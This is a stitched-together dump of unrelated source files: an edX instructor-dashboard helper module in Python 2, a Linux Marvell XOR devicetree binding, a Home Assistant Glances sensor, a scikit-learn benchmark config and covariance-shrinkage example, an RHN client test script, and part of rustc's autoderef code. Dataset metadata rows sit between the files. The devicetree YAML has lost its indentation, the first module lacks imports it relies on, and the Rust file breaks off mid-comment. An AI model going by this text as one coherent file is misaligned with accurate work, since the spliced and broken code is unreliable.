from courseware.student_field_overrides import clear_override_for_user, get_override_for_user, override_field_for_user
from xmodule.fields import Date
DATE_FIELD = Date()
class DashboardError(Exception):
    """
    Errors arising from use of the instructor dashboard.

    NOTE: Python 2 module (uses `unicode`).
    """
    def response(self):
        """
        Generate an instance of HttpResponseBadRequest for this error,
        serializing the message as {"error": ...} JSON.
        """
        error = unicode(self)
        return HttpResponseBadRequest(json.dumps({'error': error}))
def handle_dashboard_error(view):
    """
    Decorator which adds seamless DashboardError handling to a view. If a
    DashboardError is raised during view processing, an HttpResponseBadRequest
    is sent back to the client with JSON data about the error.

    NOTE(review): does not apply functools.wraps, so the wrapped view loses
    its __name__/__doc__ — confirm whether any introspection relies on them.
    """
    def wrapper(request, course_id):
        """
        Wrap the view.
        """
        try:
            return view(request, course_id=course_id)
        except DashboardError, error:  # Python 2 except syntax
            return error.response()
    return wrapper
def strip_if_string(value):
    """Strip surrounding whitespace when @value is a string (Python 2
    `basestring` covers str and unicode); return anything else unchanged."""
    if isinstance(value, basestring):
        return value.strip()
    return value
def get_student_from_identifier(unique_student_identifier):
    """
    Gets a student object using either an email address or username.

    Identifiers containing '@' are treated as email addresses, anything else
    as a username.  Raises User.DoesNotExist if no user object can be found.
    """
    identifier = strip_if_string(unique_student_identifier)
    lookup_field = "email" if "@" in identifier else "username"
    return User.objects.get(**{lookup_field: identifier})
def require_student_from_identifier(unique_student_identifier):
    """
    Same as get_student_from_identifier() but raises a DashboardError
    (instead of User.DoesNotExist) when the student does not exist.
    """
    try:
        return get_student_from_identifier(unique_student_identifier)
    except User.DoesNotExist:
        message = _("Could not find student matching identifier: {student_identifier}").format(
            student_identifier=unique_student_identifier
        )
        raise DashboardError(message)
def parse_datetime(datestr):
    """
    Convert user input date string into an instance of `datetime.datetime` in
    UTC.  Raises DashboardError for unparseable input.

    NOTE(review): .replace(tzinfo=UTC) stamps UTC over whatever offset was
    parsed, rather than converting — confirm that inputs never carry a tz.
    """
    # `import dateutil` alone does not bind the `parser` submodule; import it
    # explicitly so dateutil.parser is guaranteed to exist.
    import dateutil.parser
    try:
        return dateutil.parser.parse(datestr).replace(tzinfo=UTC)
    except ValueError:
        raise DashboardError(_("Unable to parse date: ") + datestr)
def find_unit(course, url):
    """
    Finds the unit (block, module, whatever the terminology is) with the given
    url in the course tree and returns the unit. Raises DashboardError if no
    unit is found.
    """
    def _search(node):
        """Depth-first search for the node whose location matches url."""
        if text_type(node.location) == url:
            return node
        for child in node.get_children():
            match = _search(child)
            if match:
                return match
        return None

    unit = _search(course)
    if unit is None:
        raise DashboardError(_("Couldn't find module for url: {0}").format(url))
    return unit
def get_units_with_due_date(course):
    """
    Return all top level units which have due dates.  Descendants of a node
    that already has a due date are not inspected.
    """
    units = []

    def collect(node):
        """Append ``node`` if it carries a due date, otherwise recurse."""
        if getattr(node, 'due', None):
            units.append(node)
            return
        for child in node.get_children():
            collect(child)

    collect(course)
    return units
def title_or_url(node):
    """
    Return the node's ``display_name`` when it has a non-empty one,
    otherwise the text form of its location url.
    """
    name = getattr(node, 'display_name', None)
    return name if name else text_type(node.location)
def set_due_date_extension(course, unit, student, due_date):
    """
    Grant (or, when ``due_date`` is falsy, revoke) a due date extension for
    ``student`` on ``unit``.  Raises DashboardError when the unit has no due
    date, when the new date would not actually extend it, or when there is
    no extension to revoke.
    """
    if not due_date:
        # Revoking: there must be an existing override to clear.
        if not get_override_for_user(student, unit, 'due'):
            raise DashboardError(_("No due date extension is set for that student and unit."))
        clear_override_for_user(student, unit, 'due')
        return

    # Granting: validate against the unmodified (non-overridden) due date.
    with disable_overrides():
        original_due_date = getattr(unit, 'due', None)
    if not original_due_date:
        raise DashboardError(_("Unit {0} has no due date to extend.").format(unit.location))
    if due_date < original_due_date:
        raise DashboardError(_("An extended due date must be later than the original due date."))
    override_field_for_user(student, unit, 'due', due_date)
def dump_module_extensions(course, unit):
    """
    Build a report of students holding due date extensions for ``unit`` in
    ``course``.  Returns a dict with ``header``, ``title`` and ``data``
    rows, sorted by username.
    """
    header = [_("Username"), _("Full Name"), _("Extended Due Date")]
    overrides = StudentFieldOverride.objects.filter(
        course_id=course.id,
        location=unit.location,
        field='due')
    data = []
    for override in overrides:
        due_date = DATE_FIELD.from_json(json.loads(override.value))
        row = (
            override.student.username,
            override.student.profile.name,
            due_date.strftime("%Y-%m-%d %H:%M"),
        )
        data.append(dict(zip(header, row)))
    data.sort(key=lambda row: row[header[0]])
    return {
        "header": header,
        "title": _("Users with due date extensions for {0}").format(
            title_or_url(unit)),
        "data": data
    }
def dump_student_extensions(course, student):
    """
    Build a report of the due date extensions granted to ``student`` in
    ``course``.  Returns a dict with ``header``, ``title`` and ``data``.
    """
    header = [_("Unit"), _("Extended Due Date")]
    units_by_location = {
        unit.location: unit for unit in get_units_with_due_date(course)
    }
    overrides = StudentFieldOverride.objects.filter(
        course_id=course.id,
        student=student,
        field='due')
    data = []
    for override in overrides:
        location = override.location.replace(course_key=course.id)
        if location not in units_by_location:
            # Skip overrides for units that no longer carry a due date.
            continue
        due_date = DATE_FIELD.from_json(json.loads(override.value))
        data.append(dict(zip(header, (
            title_or_url(units_by_location[location]),
            due_date.strftime("%Y-%m-%d %H:%M"),
        ))))
    return {
        "header": header,
        "title": _("Due date extensions for {0} {1} ({2})").format(
            student.first_name, student.last_name, student.username),
        "data": data}
def add_block_ids(payload):
    """
    Pass block_ids explicitly in the payload rather than requiring the
    client to parse them out of module_ids.
    """
    for entry in payload.get('data', []):
        if 'module_id' in entry:
            entry['block_id'] = UsageKey.from_string(entry['module_id']).block_id
# SPDX-License-Identifier: (GPL-2.0-only OR BSD-2-Clause)
%YAML 1.2
---
$id: http://devicetree.org/schemas/dma/marvell,orion-xor.yaml#
$schema: http://devicetree.org/meta-schemas/core.yaml#
title: Marvell XOR engine
maintainers:
- Andrew Lunn <andrew@lunn.ch>
- Gregory Clement <gregory.clement@bootlin.com>
properties:
compatible:
oneOf:
- items:
- const: marvell,armada-380-xor
- const: marvell,orion-xor
- enum:
- marvell,armada-3700-xor
- marvell,orion-xor
reg:
items:
- description: Low registers for the XOR engine
- description: High registers for the XOR engine
clocks:
maxItems: 1
patternProperties:
"^(channel|xor)[0-9]+$":
description: XOR channel sub-node
type: object
additionalProperties: false
properties:
interrupts:
description: Interrupt specifier for the XOR channel
items:
- description: Interrupt for this channel
dmacap,memcpy:
type: boolean
deprecated: true
description:
Indicates that the XOR channel is capable of memcpy operations
dmacap,memset:
type: boolean
deprecated: true
description:
Indicates that the XOR channel is capable of memset operations
dmacap,xor:
type: boolean
deprecated: true
description:
Indicates that the XOR channel is capable of xor operations
required:
- interrupts
required:
- compatible
- reg
additionalProperties: false
examples:
- |
xor@d0060900 {
compatible = "marvell,orion-xor";
reg = <0xd0060900 0x100>,
<0xd0060b00 0x100>;
clocks = <&coreclk 0>;
xor00 {
interrupts = <51>;
};
xor01 {
interrupts = <52>;
};
}; | unknown | github | https://github.com/torvalds/linux | Documentation/devicetree/bindings/dma/marvell,orion-xor.yaml |
"""
Support gathering system information of hosts which are running glances.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/sensor.glances/
"""
import logging
from datetime import timedelta
import requests
import voluptuous as vol
import homeassistant.helpers.config_validation as cv
from homeassistant.components.sensor import PLATFORM_SCHEMA
from homeassistant.const import (
CONF_HOST, CONF_PORT, CONF_NAME, CONF_RESOURCES, TEMP_CELSIUS)
from homeassistant.helpers.entity import Entity
from homeassistant.util import Throttle
_LOGGER = logging.getLogger(__name__)
# Glances v2 REST endpoint that returns all stats in a single JSON document.
_RESOURCE = 'api/2/all'
DEFAULT_HOST = 'localhost'
DEFAULT_NAME = 'Glances'
DEFAULT_PORT = '61208'
# Throttle interval for polling the Glances REST API.
MIN_TIME_BETWEEN_UPDATES = timedelta(minutes=1)
# Map of resource key -> [friendly name, unit of measurement, mdi icon].
SENSOR_TYPES = {
    'disk_use_percent': ['Disk used', '%', 'mdi:harddisk'],
    'disk_use': ['Disk used', 'GiB', 'mdi:harddisk'],
    'disk_free': ['Disk free', 'GiB', 'mdi:harddisk'],
    'memory_use_percent': ['RAM used', '%', 'mdi:memory'],
    'memory_use': ['RAM used', 'MiB', 'mdi:memory'],
    'memory_free': ['RAM free', 'MiB', 'mdi:memory'],
    'swap_use_percent': ['Swap used', '%', 'mdi:memory'],
    'swap_use': ['Swap used', 'GiB', 'mdi:memory'],
    'swap_free': ['Swap free', 'GiB', 'mdi:memory'],
    'processor_load': ['CPU load', '15 min', 'mdi:memory'],
    'process_running': ['Running', 'Count', 'mdi:memory'],
    'process_total': ['Total', 'Count', 'mdi:memory'],
    'process_thread': ['Thread', 'Count', 'mdi:memory'],
    'process_sleeping': ['Sleeping', 'Count', 'mdi:memory'],
    'cpu_temp': ['CPU Temp', TEMP_CELSIUS, 'mdi:thermometer'],
}
# Platform configuration: host/port of the Glances server plus the list of
# resource keys (from SENSOR_TYPES) to expose as sensors.
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
    vol.Required(CONF_HOST, default=DEFAULT_HOST): cv.string,
    vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
    vol.Optional(CONF_PORT, default=DEFAULT_PORT): cv.port,
    vol.Optional(CONF_RESOURCES, default=['disk_use']):
        vol.All(cv.ensure_list, [vol.In(SENSOR_TYPES)]),
})
# pylint: disable=unused-variable
def setup_platform(hass, config, add_devices, discovery_info=None):
    """Set up the Glances sensors from the validated platform config."""
    name = config.get(CONF_NAME)
    endpoint = 'http://{}:{}/{}'.format(
        config.get(CONF_HOST), config.get(CONF_PORT), _RESOURCE)
    rest = GlancesData(endpoint)
    rest.update()
    sensors = [GlancesSensor(rest, name, resource)
               for resource in config.get(CONF_RESOURCES)]
    add_devices(sensors, True)
class GlancesSensor(Entity):
    """Implementation of a Glances sensor."""

    def __init__(self, rest, name, sensor_type):
        """Initialize the sensor.

        rest: shared GlancesData fetcher.
        name: user-facing platform name prefix.
        sensor_type: key into SENSOR_TYPES selecting which stat to expose.
        """
        self.rest = rest
        self._name = name
        self.type = sensor_type
        self._state = None
        self._unit_of_measurement = SENSOR_TYPES[sensor_type][1]

    @property
    def name(self):
        """Return the name of the sensor."""
        return '{} {}'.format(self._name, SENSOR_TYPES[self.type][0])

    @property
    def icon(self):
        """Icon to use in the frontend, if any."""
        return SENSOR_TYPES[self.type][2]

    @property
    def unit_of_measurement(self):
        """Return the unit the value is expressed in."""
        return self._unit_of_measurement

    @property
    def available(self):
        """Could the device be accessed during the last update call."""
        return self.rest.data is not None

    @property
    def state(self):
        """Return the state of the resources."""
        return self._state

    def update(self):
        """Get the latest data from the REST API and update the state."""
        self.rest.update()
        value = self.rest.data
        if value is None:
            # Last fetch failed; report unknown (sensor is unavailable anyway).
            self._state = None
            return
        if self.type == 'disk_use_percent':
            self._state = value['fs'][0]['percent']
        elif self.type == 'disk_use':
            self._state = round(value['fs'][0]['used'] / 1024**3, 1)
        elif self.type == 'disk_free':
            try:
                self._state = round(value['fs'][0]['free'] / 1024**3, 1)
            except KeyError:
                # Some filesystems only report size/used, not free.
                self._state = round((value['fs'][0]['size'] -
                                     value['fs'][0]['used']) / 1024**3, 1)
        elif self.type == 'memory_use_percent':
            self._state = value['mem']['percent']
        elif self.type == 'memory_use':
            self._state = round(value['mem']['used'] / 1024**2, 1)
        elif self.type == 'memory_free':
            self._state = round(value['mem']['free'] / 1024**2, 1)
        elif self.type == 'swap_use_percent':
            self._state = value['memswap']['percent']
        elif self.type == 'swap_use':
            self._state = round(value['memswap']['used'] / 1024**3, 1)
        elif self.type == 'swap_free':
            self._state = round(value['memswap']['free'] / 1024**3, 1)
        elif self.type == 'processor_load':
            # Windows systems don't provide load details
            try:
                self._state = value['load']['min15']
            except KeyError:
                self._state = value['cpu']['total']
        elif self.type == 'process_running':
            self._state = value['processcount']['running']
        elif self.type == 'process_total':
            self._state = value['processcount']['total']
        elif self.type == 'process_thread':
            self._state = value['processcount']['thread']
        elif self.type == 'process_sleeping':
            self._state = value['processcount']['sleeping']
        elif self.type == 'cpu_temp':
            # BUGFIX: previously `self._state = None` ran unconditionally
            # after the sensor loop, wiping out any temperature that had
            # just been found.  Only report None when no 'CPU' sensor exists.
            self._state = None
            for sensor in value['sensors']:
                if sensor['label'] == 'CPU':
                    self._state = sensor['value']
                    break
class GlancesData(object):
    """The class for handling the data retrieval."""

    def __init__(self, resource):
        """Initialize the data object.

        resource: full URL of the Glances REST endpoint.
        """
        self._resource = resource
        # None signals "last fetch failed"; sensors report unavailable then.
        self.data = {}

    @Throttle(MIN_TIME_BETWEEN_UPDATES)
    def update(self):
        """Get the latest data from the Glances REST API."""
        try:
            response = requests.get(self._resource, timeout=10)
            self.data = response.json()
        # RequestException also covers timeouts and HTTP-level failures,
        # which the previous ConnectionError-only handler let crash the
        # update cycle.
        except requests.exceptions.RequestException:
            _LOGGER.error("Connection error: %s", self._resource)
            self.data = None
{
// "regular": Bencharks are run on small to medium datasets. Each benchmark
// is run multiple times and averaged.
// "fast": Benchmarks are run on small to medium datasets. Each benchmark
// is run only once. May provide unstable benchmarks.
// "large_scale": Benchmarks are run on large datasets. Each benchmark is
// run multiple times and averaged. This profile is meant to
// benchmark scalability and will take hours on single core.
// Can be overridden by environment variable SKLBENCH_PROFILE.
"profile": "regular",
// List of values of n_jobs to use for estimators which accept this
// parameter (-1 means all cores). An empty list means all values from 1 to
// the maximum number of available cores.
// Can be overridden by environment variable SKLBENCH_NJOBS.
"n_jobs_vals": [1],
// If true, fitted estimators are saved in ./cache/estimators/<commit hash>
// Can be overridden by environment variable SKLBENCH_SAVE_ESTIMATORS.
"save_estimators": false,
// Commit hash to compare estimator predictions with.
// If null, predictions are not compared.
// Can be overridden by environment variable SKLBENCH_BASE_COMMIT.
"base_commit": null,
// If false, the predict (resp. transform) method of the estimators won't
// be benchmarked.
// Can be overridden by environment variables SKLBENCH_PREDICT and
// SKLBENCH_TRANSFORM.
"bench_predict": true,
"bench_transform": true
} | json | github | https://github.com/scikit-learn/scikit-learn | asv_benchmarks/benchmarks/config.json |
#!/usr/bin/python
#
#
#
import sys
sys.path.append('..')
from rhn.rpclib import Server, GETServer
SERVER = "http://xmlrpc.rhn.redhat.com/XMLRPC"
system_id_file = "/etc/sysconfig/rhn/systemid"
try:
SERVER = "http://%s/XMLRPC" % sys.argv[1]
system_id_file = sys.argv[2]
except:
pass
print "SERVER = %s" % SERVER
print "system_id_file = %s" % system_id_file
def refreshCallback(*args, **kwargs):
    # Trace hook handed to the RHN Server objects; simply echoes whatever
    # arguments the library passes in.
    print "Called refreshCallback, args %s, kwargs %s" % (args, kwargs)
def progressCallback(*args, **kwargs):
    # Download-progress hook handed to the RHN server objects; echoes its
    # arguments for debugging.
    print "Called progressCallback, args %s, kwargs %s" % (args, kwargs)
if __name__ == '__main__':
sysid = open(system_id_file).read()
s = Server(SERVER)
s.set_refresh_callback(refreshCallback)
s.set_progress_callback(progressCallback)
dict = s.up2date.login(sysid)
gs = GETServer(SERVER, headers=dict)
gs.set_refresh_callback(refreshCallback)
gs.set_progress_callback(progressCallback, 16384)
channels = dict['X-RHN-Auth-Channels']
cn, cv = channels[0][:2]
print "Calling listPackages"
l = gs.listPackages(cn, cv)
for p in l:
if p[0] == 'kernel':
package = p
break
else:
raise Exception("Package not found")
print "PACKAGE TO DOWNLOAD: %s %s %s %s" % (package[0], package[1], package[2], package[4])
filename = "%s-%s-%s.%s.rpm" % (package[0], package[1], package[2], package[4])
print "Calling getPackages"
fd = gs.getPackage(cn, filename)
data_name = "/tmp/foobar"
data = open(data_name, "w+").write(fd.read())
print "PACKAGE DOWNLOADED AS: %s" % data_name | unknown | codeparrot/codeparrot-clean | ||
"""
=======================================================================
Shrinkage covariance estimation: LedoitWolf vs OAS and max-likelihood
=======================================================================
When working with covariance estimation, the usual approach is to use
a maximum likelihood estimator, such as the
:class:`~sklearn.covariance.EmpiricalCovariance`. It is unbiased, i.e. it
converges to the true (population) covariance when given many
observations. However, it can also be beneficial to regularize it, in
order to reduce its variance; this, in turn, introduces some bias. This
example illustrates the simple regularization used in
:ref:`shrunk_covariance` estimators. In particular, it focuses on how to
set the amount of regularization, i.e. how to choose the bias-variance
trade-off.
.. rubric:: References
.. [1] "Shrinkage Algorithms for MMSE Covariance Estimation"
Chen et al., IEEE Trans. on Sign. Proc., Volume 58, Issue 10, October 2010.
"""
# Authors: The scikit-learn developers
# SPDX-License-Identifier: BSD-3-Clause
# %%
# Generate sample data
# --------------------
import numpy as np
# n_features > n_samples: the empirical covariance is ill-conditioned here,
# which is exactly the regime where shrinkage helps.
n_features, n_samples = 40, 20
np.random.seed(42)
base_X_train = np.random.normal(size=(n_samples, n_features))
base_X_test = np.random.normal(size=(n_samples, n_features))
# Color samples: multiplying i.i.d. Gaussian samples by a random matrix
# gives them a non-trivial covariance structure to estimate.
coloring_matrix = np.random.normal(size=(n_features, n_features))
X_train = np.dot(base_X_train, coloring_matrix)
X_test = np.dot(base_X_test, coloring_matrix)
# %%
# Compute the likelihood on test data
# -----------------------------------
from scipy import linalg
from sklearn.covariance import ShrunkCovariance, empirical_covariance, log_likelihood
# Fit ShrunkCovariance models spanning a range of possible shrinkage
# coefficient values and score each one on the held-out test set.
shrinkages = np.logspace(-2, 0, 30)
negative_logliks = [
    -ShrunkCovariance(shrinkage=s).fit(X_train).score(X_test) for s in shrinkages
]
# Likelihood under the ground-truth model, which we would not have access
# to in real settings.
real_cov = np.dot(coloring_matrix.T, coloring_matrix)
emp_cov = empirical_covariance(X_train)
loglik_real = -log_likelihood(emp_cov, linalg.inv(real_cov))
# %%
# Compare different approaches to setting the regularization parameter
# --------------------------------------------------------------------
#
# Here we compare 3 approaches:
#
# * Setting the parameter by cross-validating the likelihood on three folds
#   according to a grid of potential shrinkage parameters.
#
# * A close formula proposed by Ledoit and Wolf to compute
#   the asymptotically optimal regularization parameter (minimizing an MSE
#   criterion), yielding the :class:`~sklearn.covariance.LedoitWolf`
#   covariance estimate.
#
# * An improvement of the Ledoit-Wolf shrinkage, the
#   :class:`~sklearn.covariance.OAS`, proposed by Chen et al. [1]_. Its
#   convergence is significantly better under the assumption that the data
#   are Gaussian, in particular for small samples.
from sklearn.covariance import OAS, LedoitWolf
from sklearn.model_selection import GridSearchCV
# GridSearch for an optimal shrinkage coefficient
tuned_parameters = [{"shrinkage": shrinkages}]
cv = GridSearchCV(ShrunkCovariance(), tuned_parameters)
cv.fit(X_train)
# Ledoit-Wolf optimal shrinkage coefficient estimate
lw = LedoitWolf()
loglik_lw = lw.fit(X_train).score(X_test)
# OAS coefficient estimate
oa = OAS()
loglik_oa = oa.fit(X_train).score(X_test)
# %%
# Plot results
# ------------
#
#
# To quantify estimation error, we plot the likelihood of unseen data for
# different values of the shrinkage parameter. We also show the choices by
# cross-validation, or with the LedoitWolf and OAS estimates.
import matplotlib.pyplot as plt
fig = plt.figure()
plt.title("Regularized covariance: likelihood and shrinkage coefficient")
plt.xlabel("Regularization parameter: shrinkage coefficient")
plt.ylabel("Error: negative log-likelihood on test data")
# range shrinkage curve
plt.loglog(shrinkages, negative_logliks, label="Negative log-likelihood")
plt.plot(plt.xlim(), 2 * [loglik_real], "--r", label="Real covariance likelihood")
# adjust view: pad the y-limits so the vertical marker lines stay visible
lik_max = np.amax(negative_logliks)
lik_min = np.amin(negative_logliks)
ymin = lik_min - 6.0 * np.log((plt.ylim()[1] - plt.ylim()[0]))
ymax = lik_max + 10.0 * np.log(lik_max - lik_min)
xmin = shrinkages[0]
xmax = shrinkages[-1]
# LW likelihood: vertical line at the Ledoit-Wolf chosen shrinkage
plt.vlines(
    lw.shrinkage_,
    ymin,
    -loglik_lw,
    color="magenta",
    linewidth=3,
    label="Ledoit-Wolf estimate",
)
# OAS likelihood
plt.vlines(
    oa.shrinkage_, ymin, -loglik_oa, color="purple", linewidth=3, label="OAS estimate"
)
# best CV estimator likelihood
plt.vlines(
    cv.best_estimator_.shrinkage,
    ymin,
    -cv.best_estimator_.score(X_test),
    color="cyan",
    linewidth=3,
    label="Cross-validation best estimate",
)
plt.ylim(ymin, ymax)
plt.xlim(xmin, xmax)
plt.legend()
plt.show()
# %%
# .. note::
#
#     The maximum likelihood estimate corresponds to no shrinkage,
#     and thus performs poorly. The Ledoit-Wolf estimate performs really well,
#     as it is close to the optimal and is not computationally costly. In this
#     example, the OAS estimate is a bit further away. Interestingly, both
#     approaches outperform cross-validation, which is significantly most
#     computationally costly.
use rustc_hir::limit::Limit;
use rustc_infer::infer::InferCtxt;
use rustc_infer::traits::PredicateObligations;
use rustc_middle::ty::{self, Ty, TyCtxt, TypeVisitableExt};
use rustc_span::def_id::{LOCAL_CRATE, LocalDefId};
use rustc_span::{ErrorGuaranteed, Span};
use rustc_trait_selection::traits::ObligationCtxt;
use tracing::{debug, instrument};
use crate::errors::AutoDerefReachedRecursionLimit;
use crate::traits;
use crate::traits::query::evaluate_obligation::InferCtxtExt;
/// How a single autoderef step is performed.
#[derive(Copy, Clone, Debug)]
pub enum AutoderefKind {
    /// A true pointer type, such as `&T` and `*mut T`.
    Builtin,
    /// A type which must dispatch to a `Deref` implementation.
    Overloaded,
}
/// Mutable state of an [`Autoderef`] traversal.
struct AutoderefSnapshot<'tcx> {
    /// True until the first `next()` call, which yields the base type
    /// itself (step 0) before any dereferencing is attempted.
    at_start: bool,
    /// Set when iteration stopped because the recursion limit was hit.
    reached_recursion_limit: bool,
    /// Each type we stepped *from*, paired with how it was dereferenced.
    steps: Vec<(Ty<'tcx>, AutoderefKind)>,
    /// The most recently produced type.
    cur_ty: Ty<'tcx>,
    /// Obligations accumulated while normalizing `Deref::Target` types.
    obligations: PredicateObligations<'tcx>,
}
/// Recursively dereference a type, considering both built-in
/// dereferences (`*`) and the `Deref` trait.
/// Although called `Autoderef` it can be configured to use the
/// `Receiver` trait instead of the `Deref` trait.
pub struct Autoderef<'a, 'tcx> {
    // Meta infos:
    infcx: &'a InferCtxt<'tcx>,
    span: Span,
    body_id: LocalDefId,
    param_env: ty::ParamEnv<'tcx>,
    // Current state:
    state: AutoderefSnapshot<'tcx>,
    // Configurations:
    /// Also step through raw pointers; see [`Self::include_raw_pointers`].
    include_raw_pointers: bool,
    /// Walk `Receiver`/`Receiver::Target` instead of `Deref`/`Deref::Target`;
    /// see [`Self::use_receiver_trait`].
    use_receiver_trait: bool,
    /// Suppress the recursion-limit diagnostic; see [`Self::silence_errors`].
    silence_errors: bool,
}
impl<'a, 'tcx> Iterator for Autoderef<'a, 'tcx> {
    type Item = (Ty<'tcx>, usize);
    // Yields `(type, step_count)` pairs: step 0 is the base type itself,
    // and each later step applies one built-in or overloaded deref.
    fn next(&mut self) -> Option<Self::Item> {
        let tcx = self.infcx.tcx;
        debug!("autoderef: steps={:?}, cur_ty={:?}", self.state.steps, self.state.cur_ty);
        if self.state.at_start {
            self.state.at_start = false;
            debug!("autoderef stage #0 is {:?}", self.state.cur_ty);
            return Some((self.state.cur_ty, 0));
        }
        // If we have reached the recursion limit, error gracefully.
        if !tcx.recursion_limit().value_within_limit(self.state.steps.len()) {
            if !self.silence_errors {
                report_autoderef_recursion_limit_error(tcx, self.span, self.state.cur_ty);
            }
            self.state.reached_recursion_limit = true;
            return None;
        }
        // We want to support method and function calls for `impl Deref<Target = ..>`.
        //
        // To do so we don't eagerly bail if the current type is the hidden type of an
        // opaque type and instead return `None` in `fn overloaded_deref_ty` if the
        // opaque does not have a `Deref` item-bound.
        if let &ty::Infer(ty::TyVar(vid)) = self.state.cur_ty.kind()
            && !self.infcx.has_opaques_with_sub_unified_hidden_type(vid)
        {
            return None;
        }
        // Otherwise, deref if type is derefable:
        // NOTE: in the case of self.use_receiver_trait = true, you might think it would
        // be better to skip this clause and use the Overloaded case only, since &T
        // and &mut T implement Receiver. But built-in derefs apply equally to Receiver
        // and Deref, and this has benefits for const and the emitted MIR.
        let (kind, new_ty) =
            if let Some(ty) = self.state.cur_ty.builtin_deref(self.include_raw_pointers) {
                debug_assert_eq!(ty, self.infcx.resolve_vars_if_possible(ty));
                // NOTE: we may still need to normalize the built-in deref in case
                // we have some type like `&<Ty as Trait>::Assoc`, since users of
                // autoderef expect this type to have been structurally normalized.
                if self.infcx.next_trait_solver()
                    && let ty::Alias(..) = ty.kind()
                {
                    let (normalized_ty, obligations) = self.structurally_normalize_ty(ty)?;
                    self.state.obligations.extend(obligations);
                    (AutoderefKind::Builtin, normalized_ty)
                } else {
                    (AutoderefKind::Builtin, ty)
                }
            } else if let Some(ty) = self.overloaded_deref_ty(self.state.cur_ty) {
                // The overloaded deref check already normalizes the pointee type.
                (AutoderefKind::Overloaded, ty)
            } else {
                return None;
            };
        // Record the type we stepped *from*; `steps()` exposes this trail.
        self.state.steps.push((self.state.cur_ty, kind));
        debug!(
            "autoderef stage #{:?} is {:?} from {:?}",
            self.step_count(),
            new_ty,
            (self.state.cur_ty, kind)
        );
        self.state.cur_ty = new_ty;
        Some((self.state.cur_ty, self.step_count()))
    }
}
impl<'a, 'tcx> Autoderef<'a, 'tcx> {
    /// Creates a walker that starts at `base_ty` (with inference variables
    /// resolved) and performs no steps until iterated.  `span` and
    /// `body_def_id` locate the expression being autoderef'd and are used
    /// for obligation causes and diagnostics.
    pub fn new(
        infcx: &'a InferCtxt<'tcx>,
        param_env: ty::ParamEnv<'tcx>,
        body_def_id: LocalDefId,
        span: Span,
        base_ty: Ty<'tcx>,
    ) -> Self {
        Autoderef {
            infcx,
            span,
            body_id: body_def_id,
            param_env,
            state: AutoderefSnapshot {
                steps: vec![],
                cur_ty: infcx.resolve_vars_if_possible(base_ty),
                obligations: PredicateObligations::new(),
                at_start: true,
                reached_recursion_limit: false,
            },
            include_raw_pointers: false,
            use_receiver_trait: false,
            silence_errors: false,
        }
    }
    /// Computes the type produced by one overloaded deref step from `ty`:
    /// the normalized `<ty as Deref>::Target` (or `Receiver::Target` when
    /// configured via [`Self::use_receiver_trait`]).  Returns `None` when
    /// `ty` cannot be shown to implement the trait.
    fn overloaded_deref_ty(&mut self, ty: Ty<'tcx>) -> Option<Ty<'tcx>> {
        debug!("overloaded_deref_ty({:?})", ty);
        let tcx = self.infcx.tcx;
        if ty.references_error() {
            return None;
        }
        // <ty as Deref>, or whatever the equivalent trait is that we've been asked to walk.
        let (trait_def_id, trait_target_def_id) = if self.use_receiver_trait {
            (tcx.lang_items().receiver_trait()?, tcx.lang_items().receiver_target()?)
        } else {
            (tcx.lang_items().deref_trait()?, tcx.lang_items().deref_target()?)
        };
        let trait_ref = ty::TraitRef::new(tcx, trait_def_id, [ty]);
        let cause = traits::ObligationCause::misc(self.span, self.body_id);
        let obligation = traits::Obligation::new(
            tcx,
            cause.clone(),
            self.param_env,
            ty::Binder::dummy(trait_ref),
        );
        // We detect whether the self type implements `Deref` before trying to
        // structurally normalize. We use `predicate_may_hold_opaque_types_jank`
        // to support not-yet-defined opaque types. It will succeed for `impl Deref`
        // but fail for `impl OtherTrait`.
        if !self.infcx.predicate_may_hold_opaque_types_jank(&obligation) {
            debug!("overloaded_deref_ty: cannot match obligation");
            return None;
        }
        let (normalized_ty, obligations) =
            self.structurally_normalize_ty(Ty::new_projection(tcx, trait_target_def_id, [ty]))?;
        debug!("overloaded_deref_ty({:?}) = ({:?}, {:?})", ty, normalized_ty, obligations);
        self.state.obligations.extend(obligations);
        Some(self.infcx.resolve_vars_if_possible(normalized_ty))
    }
    /// Structurally normalizes `ty`, returning the normalized type together
    /// with any pending obligations, or `None` on normalization errors.
    #[instrument(level = "debug", skip(self), ret)]
    pub fn structurally_normalize_ty(
        &self,
        ty: Ty<'tcx>,
    ) -> Option<(Ty<'tcx>, PredicateObligations<'tcx>)> {
        let ocx = ObligationCtxt::new(self.infcx);
        let Ok(normalized_ty) = ocx.structurally_normalize_ty(
            &traits::ObligationCause::misc(self.span, self.body_id),
            self.param_env,
            ty,
        ) else {
            // We shouldn't have errors here in the old solver, except for
            // evaluate/fulfill mismatches, but that's not a reason for an ICE.
            return None;
        };
        let errors = ocx.try_evaluate_obligations();
        if !errors.is_empty() {
            if self.infcx.next_trait_solver() {
                unreachable!();
            }
            // We shouldn't have errors here in the old solver, except for
            // evaluate/fulfill mismatches, but that's not a reason for an ICE.
            debug!(?errors, "encountered errors while fulfilling");
            return None;
        }
        Some((normalized_ty, ocx.into_pending_obligations()))
    }
    /// Returns the final type we ended up with, which may be an unresolved
    /// inference variable.
    pub fn final_ty(&self) -> Ty<'tcx> {
        self.state.cur_ty
    }
    /// Number of deref steps performed so far (the base type is step 0).
    pub fn step_count(&self) -> usize {
        self.state.steps.len()
    }
    /// Consumes the walker, returning the accumulated obligations.
    pub fn into_obligations(self) -> PredicateObligations<'tcx> {
        self.state.obligations
    }
    /// Clones the obligations accumulated so far without consuming `self`.
    pub fn current_obligations(&self) -> PredicateObligations<'tcx> {
        self.state.obligations.clone()
    }
    /// The types stepped *from* so far, each with the kind of deref applied.
    pub fn steps(&self) -> &[(Ty<'tcx>, AutoderefKind)] {
        &self.state.steps
    }
    /// The span this walker reports diagnostics at.
    pub fn span(&self) -> Span {
        self.span
    }
    /// Whether iteration stopped because the recursion limit was hit.
    pub fn reached_recursion_limit(&self) -> bool {
        self.state.reached_recursion_limit
    }
    /// also dereference through raw pointer types
    /// e.g., assuming ptr_to_Foo is the type `*const Foo`
    /// fcx.autoderef(span, ptr_to_Foo) => [*const Foo]
    /// fcx.autoderef(span, ptr_to_Foo).include_raw_ptrs() => [*const Foo, Foo]
    pub fn include_raw_pointers(mut self) -> Self {
        self.include_raw_pointers = true;
        self
    }
    /// Use `core::ops::Receiver` and `core::ops::Receiver::Target` as
    /// the trait and associated type to iterate, instead of
